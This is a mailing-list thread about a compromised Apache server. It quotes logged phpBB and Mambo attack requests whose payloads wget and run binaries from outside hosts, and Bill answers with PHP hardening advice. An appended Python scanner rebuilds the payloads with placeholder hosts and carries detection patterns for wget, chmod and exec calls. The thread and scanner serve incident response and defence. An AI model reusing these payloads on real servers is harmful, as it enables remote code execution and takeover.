David wrote:
> Thanks Peter - reassuring to know that someone else thinks they probably
> didn't get root... I have been watching ps and netstat -p and haven't
> seen anything suspicious, nor seen any more rogue messages in my mail
> queue... fingers crossed :) I have plans to replace this box ASAP however.
> 
> I uncovered this in the apache logs:
> 
> ./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
> 
> looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the
> system weathered that one. Closer to date is:
> 
> ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1
> 
> But it looks like that one failed. Oh well time to update php and clean
> out a few old phpbb installs. Thanks all for your help.
> 
> David


A few things I always run into with PHP that are popular:

1) Make sure PHPBB is the latest version and not exploitable.  I used to
allow my clients to install it, but every few months, SOMEONE would
install an old exploitable version.  I've switched to using Debian's
PHPBB package, and just point clients to it so I don't have to keep
track of it anymore.  I just run security updates daily instead on all
packages.  Haven't been exploited since.

2) Keep register_globals off, and only turn it on as needed.

3) Make sure allow_url_fopen is set to OFF.  This is a very popular one,
and in my experience tends to attract DDoS attacks rather than a mail
exploit.  But it costs you expensive bandwidth nonetheless.

Regards,

Bill
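The two requests David quoted are exactly the shapes a routine log review should catch, and Bill's points 2 and 3 map onto two of the indicators in them. What follows is an added example, not code from either poster: a small Python scanner that parses Apache common-log lines, decodes each query parameter repeatedly (the phpBB request encodes its quotes as %2527, so the server's decode yields %27 and the application's own second decode yields the real quote), and flags four things seen in the thread: a PHP execution call such as passthru( inside a parameter, a shell download chain (cd /tmp;wget ...;chmod ...), a parameter named like a superglobal (_REQUEST[...], GLOBALS), which only has effect when register_globals is on, and a *path parameter pointing at an http:// URL, which is what allow_url_fopen turns into a remote include. The sample log lines are constructed to mirror the quoted requests; the IPs are RFC 5737 documentation addresses and attacker.invalid is a placeholder host, not the addresses from the original post. The regexes and indicator names are this example's own.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample access_log lines (not the lines from the original post):
# the first mirrors the phpBB viewtopic.php "highlight" request, the second the
# Mambo mosConfig_absolute_path request as it would look had it reached the
# access log, the third is a harmless search. IPs are RFC 5737 documentation
# addresses and attacker.invalid is a placeholder host.
SAMPLE_LOG = (
    '192.0.2.10 - - [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php'
    '?t=2&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20attacker.invalid'
    '/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh&highlight=%2527.%70%61%73%73%74%68%72%75'
    '%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1"'
    ' 200 21138 "-" "Mozilla/4.0"\n'
    '198.51.100.7 - - [15/Jan/2006:22:51:53 +1030] "GET /php/mambo/index2.php'
    '?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.9'
    '/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.9/micu;chmod%20744%20micu;./micu HTTP/1.1"'
    ' 404 512 "-" "-"\n'
    '203.0.113.5 - - [15/Jan/2006:10:00:00 +1030] "GET /store/phpbb2/viewtopic.php'
    '?t=2&highlight=apache HTTP/1.1" 200 8000 "-" "Mozilla/5.0"\n'
)

# Apache common/combined log format, up to the status and size fields.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators drawn from the two requests in the thread (example's own patterns).
PHP_EXEC_RE = re.compile(r'\b(?:passthru|system|exec|shell_exec|popen|eval)\s*\(', re.I)
SHELL_CHAIN_RE = re.compile(r'(?:^|[;&|])\s*(?:cd\s+/tmp\b|wget\s|curl\s|chmod\s+[0-7]{3,4}\s)', re.I)
SUPERGLOBAL_NAME_RE = re.compile(r'^(?:GLOBALS$|_(?:GET|POST|REQUEST|SERVER|COOKIE|SESSION|FILES|ENV)\[)', re.I)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
INCLUDE_NAME_RE = re.compile(r'path|dir|file|include', re.I)


def fully_decode(s, max_rounds=3):
    """Percent-decode until the string stops changing (bounded).

    The phpBB request encodes its quotes as %2527: the server decodes that to
    %27 and the application decodes again to a real quote, so a single decode
    would hide the injected PHP."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def decoded_params(target):
    """Split the query string on '&' only (';' is part of the shell payload, not
    a separator here) and return [(name, value)] with both fully decoded."""
    query = target.partition('?')[2]
    pairs = []
    for item in query.split('&'):
        if not item:
            continue
        name, _, value = item.partition('=')
        pairs.append((fully_decode(unquote_plus(name)), fully_decode(unquote_plus(value))))
    return pairs


def analyse_target(target):
    """Return [(indicator, parameter_name)] for one request target."""
    findings = []
    for name, value in decoded_params(target):
        if SUPERGLOBAL_NAME_RE.match(name):
            findings.append(('register_globals-override', name))
        if PHP_EXEC_RE.search(value):
            findings.append(('php-exec-in-param', name))
        if SHELL_CHAIN_RE.search(value):
            findings.append(('shell-download-chain', name))
        if REMOTE_URL_RE.match(value) and INCLUDE_NAME_RE.search(name):
            findings.append(('remote-include-path', name))
    return findings


def scan_log(text):
    """Parse access-log text; return one record per request that trips an indicator."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        findings = analyse_target(m.group('target'))
        if findings:
            hits.append({
                'ip': m.group('ip'),
                'time': m.group('ts'),
                'path': m.group('target').partition('?')[0],
                'status': int(m.group('status')),
                'findings': findings,
            })
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['time']} {hit['path']} status={hit['status']}")
        for indicator, param in hit['findings']:
            print(f"    {indicator} in parameter {param!r}")
```

Run it over a real log with `scan_log(open('/var/log/apache2/access.log').read())`. The status field matters when reading the output: a flagged request answered with 200, as the phpBB line in the thread was, means the application processed it, which is the cue for the closer look at processes and the mail queue that David describes; a request rejected at the protocol level, like the Mambo one, never reaches the application. The decoded parameter list from `decoded_params()` is also the quickest way to see what a payload was trying to fetch and run without decoding it by hand.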
